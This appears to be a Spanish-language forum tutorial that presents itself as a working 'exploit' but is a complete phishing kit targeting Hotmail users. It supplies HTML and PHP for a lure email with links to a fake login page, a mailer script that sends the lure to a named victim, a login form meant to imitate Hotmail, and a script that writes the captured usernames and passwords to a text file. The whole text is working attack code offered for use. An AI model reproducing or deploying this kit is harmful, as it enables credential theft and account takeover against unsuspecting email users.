Creacion de Xploit Completo Funcina Correctamente 100%
Archivos que hay que crear :
1-Exploit.html (Este es un codigo en HTML de lo que ustedes quieran ... en todos los enlaces que tenga este formulario , cuando la victima le de click debe ser redirigido a otra pagina)
2-Lanzador.php : este envia los datos a la victima.
3-login_fack.php : Este los guarda en un archivo de texto , y para los que tienen m?s experiencia en una base de datos MySql.
4-formulario.htm : Este es el que nos salta en cualquier lanzador de exploit que nos pide que pongamos nuestro mail y el de la victima para lanzar el exploit y en caso de caer sea enviado a nuestro mail.
5-login_fack.php : Este es a donde sera redireccionada la victima desp?es de recibir el exploit
6-falsear.php : Este es el archivo que procesa todos los datos despues que la victima los ingreso en "login_fack.php"
Código:
=================Exploit====================
<p><strong>Novedades de IPC-Soft </strong></p>
<table width="0" border="1" align="center" cellpadding="0" cellspacing="3">
<tr>
<td width="356">Nuevo Skin en la comunidad <a href="http://ipc-nuke.***/login_fack...">(Leer más...) </a></td>
<td width="360">Lanzadores v1.0 <a href="http://ipc-nuke.***/login_fack...">(Leer más...)</a> </td>
</tr>
<tr>
<td>MSN Messenger Fackerv2.0 <a href="http://ipc-nuke.***/login_fack...">(Leer más...)</a> </td>
<td>Cualquier cosa <a href="http://ipc-nuke.***/login_fack...">(Leer más...) </a></td>
</tr>
<tr>
<td>[by Hack-CBA]</td>
<td><a href="<A href=\'http://ipc-nuke.***/login_fack.php">http://ipc-soft.tkhttp://ipc-nuk e.***/login_fack.php">http://ipc-soft.tk</a></td>
</tr>
</table>
==================================================
Notaran que en cada (Leer más ...) nos lleva a una pagina llamada :: <A href="http://ipc-nuke.***/login_fack.php">http://ipc-nuke.***/login_fack.ph p ::
obiamente esta es la pagina donde se produce un pedido a la victima que coloque su login y pass de hotmail.
Código:
======================Lanzador.php================ ====
<?
$html="
AQUI el code de arriba (Exploit en HTML)
";
mail($victima,"Novedades IPC-Soft",$html);
echo "El exploit fu? enviado con exito";
?>
================================================== ==
Explico un poco , aqui lo que hacemos es crear una variable "$html" donde indicamos el contenido, seria el mensaje .
mail(Aquien lo enviamos, asunto , cuerpo del mensaje);
echo "Mensaje que todo esta bien";
?> cerramos php
Ahora hay que crear el formulario del lanzador, es decir, el que comunmente dice
Victima | @hotmail.com|
Tu mail | @hotmail.com |
aqui no vamos a poner ningun "Tu mail" porque en lugar de eso , crearemos un archivo de texto que nos mostrar? los users y passwordws introducidos.
Código:
============formulario.ht
m========
<form name="form1" method="post" action="lanzador.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Victima</td>
<td><input name="victima" type="text" id="victima" value="@hotmail.com"></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p></p>
====================================
aqui simplemente notaran que die "victima" type...
al enviar el formulario a "lanzador.php" , este interpreta a "victima" como $victima y es el correo a quien sera enviado el e-mail con un mensaje HTML
ok, ya esta casi todo listo. Solo nos queda hacer el "login_fack.php" donde se guardaran los passwords retenidos.
Hay que crear un formulario ... estilo la pagina principal de <A href="http://www.hotmail.com">www.hotmail.com
para que sea m?s creible.(Eso queda a su criterio , no el mio).
Código:
=============login_fack.php===================
<form name="form1" method="post" action="falsear.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Login</td>
<td><input name="login" type="text" id="login"></td>
</tr>
<tr>
<td>Password</td>
<td><input name="pass" type="password" id="pass" value=""></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p> </p>
=============================================
Aqui vemos varias cosas interesantes: falsear.php , login , pass
bueno falsear.php es la pagina que nos va a procesar todo y guardar el password
login y pass , serian
$login
$pass
ahora que sabemos esto vamos a terminar el "lanzador"
...
Creamos otra pagina php
Código:
================falsear.php====================
<?php
$archivo='pass_fack.txt';
$login=$_POST[login];
$pass=$_POST[pass];
$hcba=fopen($archivo,'a');
fwrite($hcba,$login.$pass);
echo "datos correctamente introducidos";
?>
==================================================
bueno , más simple imposible...
$archivo , tienen que colocar el nombre y extenci?n del archivo de texto que va a guardar los datos
?Que datos guarda?
$login & $pass
Los escribe con el metodo $_post .
// $hcba=fopen($archivo,'a');
Aqui indicamos que $hcba es = a abrir el archivo en modo "a" que seria ir agregando contenido sin borrar otro.
y luego indicamos que escriba en $hcba el $login y el $pass.
